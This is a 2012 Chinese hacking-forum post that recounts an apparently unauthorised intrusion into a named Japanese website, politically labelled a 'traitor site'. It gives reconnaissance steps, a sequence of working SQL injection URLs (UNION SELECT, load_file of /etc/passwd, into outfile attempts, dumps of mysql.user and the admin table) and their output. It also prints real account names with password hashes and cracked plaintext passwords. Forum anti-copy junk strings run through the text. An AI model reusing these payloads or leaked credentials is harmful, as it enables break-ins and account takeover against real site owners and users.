找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3280|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

( M: v8 M5 C6 K1 s+ v' x$ h/ ?. A1 E2 s. W7 k7 e' q8 i
0x01. 检测 www.zuaa.jp 收集数据1 C$ G0 W' V5 |; G, N

$ E: }% n# H; |* `# t; b/ q9 V; e$ W' g6 u7 s
whatweb
" T4 f+ m) F% A+ m' [2 A. s( v. T* F% K" X
! G; j( S% ~; ^& @8 M
利用NMAP扫描% O9 P" R# G0 H, ?
. q1 u6 g) a9 |9 o* c- p8 k7 z4 X
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% J' ~1 N: G" b4 o0 w4 P0x02.找注入点$ e4 I# r& d1 C
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
* H  d2 p. _4 M# I
4 R- o1 x' |" \. q( I+ g3 w* j8 f0 T0 _0 L
0x03.order by. [' ~1 }9 z+ A% Z$ V3 I
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
& i: ^% l& v3 T
% o, s4 r& w$ D) U9 C* L3 {order by 28报错,order by 27正常
/ v7 d9 E8 H8 z* P9 I& z) B* G, j5 W/ y3 U# ~/ [: e
0x04.   union手动查询% c; v/ i9 U2 d5 |2 ^% Q2 Y+ v
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
- O/ Q* k# q5 p9 S# F% L" R添加到 27 时正常显示 9 m# ]1 H5 p/ Y3 F! z

- f; I" \5 G/ I8 [中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持9 Q' R7 T% b  v4 D
; ~: I  s" y. _* v9 \5 W2 I
0x05. info:
* @8 S6 S' }% {1 \2 @; W# Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 X& r  J3 a, ~/ c9 Q' J( D

3 [3 `. E+ h* J9 R3 p) J1 {/ \user:            root@localhost/ v: t4 g1 y3 E  I( n
database:    openpne
$ ^0 \+ e' z$ K+ \version:      4.1.222 Y6 @7 [/ x, W2 S$ _4 {; y
os:             portbld-freebsd5.48 y6 y; u1 B) d+ {

) O3 r5 x0 x. c0 y) v0x06. root用户: S/ ?4 Y+ X* C& ?/ Y7 N2 k
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)7 }1 `' l( R; |0 t0 o
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! d$ n1 g- }  l" k% v, Z4 A
8 j% g- I) S3 e
通过工具转换8 L: H- b& o0 e4 A; g6 ~6 l" z

- O# L* `& l4 G, U中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* Q/ T: L( V& |/ P8 A2 m9 X' h  w
/ i( c; {7 O( ?' r2 D! e
0x07. 利用 into outfile8 f# K' K+ m; H
全部都失败
+ c# |. ?& V' i; ]+ @& z0 K9 Q* }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
) }' b- K0 w1 m% _3 ?4 [0 y- q" x( h  u- T7 c: m5 q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php " |& W) K. c" M# @6 W/ ?
. y( p! }; i$ Q3 H5 G+ Z7 i& P
页面显示“MDB2 Error:syntax error”
4 S+ M) W) ~6 C. O9 Q5 x4 a7 e) J6 ^
0x08. 利用 mysql 4.1$ E9 u" m- y  ?
猜常规表名,字段未果 工具 sqlmap! o) d( u  U/ K' p* T+ R
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; o& X5 d  Q# q: D. N& @' [% a3 ~0 N5 g
- }. M& A! P3 O1 c$ O

3 Z8 m" Q+ r* o5 }3 e4 u0x09. 查找后台
5 Q# N) `- \+ @利用 现有的各种 后台工具尝试都不行
8 A* O, D: T- w, ?) v( q! c! g0 U) h& ]
0x10.  MySL外联方法& v: ~/ ^6 R9 i! e- w
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行9 \; r' n  c) s$ @2 q# x  o
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user6 E9 F! r( L1 b) M
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
' b, T4 p; I( I, i/ c* l: [0 D6 u: z' p# [; K% S; a. a
这个可以在 www.cmd5.com 解密$ ?+ [7 l. V% ]: b9 Y* Y
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009' D/ v2 t  X# H6 D4 M* J! f
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad971 k; [& u) p* _
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???& O. K" [$ k3 H; F7 q4 O; a
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
7 k: U) h3 a" {5 J5 n0 w# R* [工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
, u. g+ Z& q2 C
3 Q/ V4 Q: q- h+ g0 r* i# |) _
0x11. 网站突破! x8 @9 V2 C  d0 E4 U
发现网站的源程序 openpne, google 下载 openpne 源码
2 h2 O% H1 }  Z5 l
9 i3 i# R) \- p1 n( ~' |' y! c4 C4 X
0x12. 默认信息利用
# b; r; l. y0 S' v: @* e; d3 ahttp://sns.zuaa.jp/?m=admin&a=page_login8 X$ u( x! d" i4 n9 a

# j( R  k7 {) N+ r表名 (c_admin_user) ,字段名(username,password)
7 _. _9 i5 }% ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
  M' L. i0 l# `# M. U, D& E1 h0 E: \* o" S! E1 }3 [3 O
解密
6 `2 O/ r# ~) |# B' tzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
. V2 A6 P# ]' U; m: y/ _7 g/ Kzuaajp:c0923ec5857796a393da99905008c176,          zju1897
6 G3 I' f  E1 M( w8 j  Y- k& l4 S3 H! ^' g& D8 f, E
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持! q0 D6 a/ r! @3 P; g; \+ e+ b) R

" b0 t4 F: H& u1 @2 H0x13. 登录后台
2 q: n8 n, U5 r1 ]  f& i$ v( T, Q1 {
0 l$ H1 n% s* l" J
* ~# A9 W- i/ O& l+ ~7 F1 F" G' Z
0x14. 小结
$ E6 f) B3 T0 C( M6 J. p) c, D/ G利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。3 L7 c. c+ o  F- s6 p- U
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
+ W& ^. I, A! t. \------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain% i- A; Q; S" O0 i; i
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ }3 G9 a! Z: \3 }/ e$ o
9 X6 ]0 ]9 V$ ~5 {最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
8 k0 r) f- e, e4 t* j

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表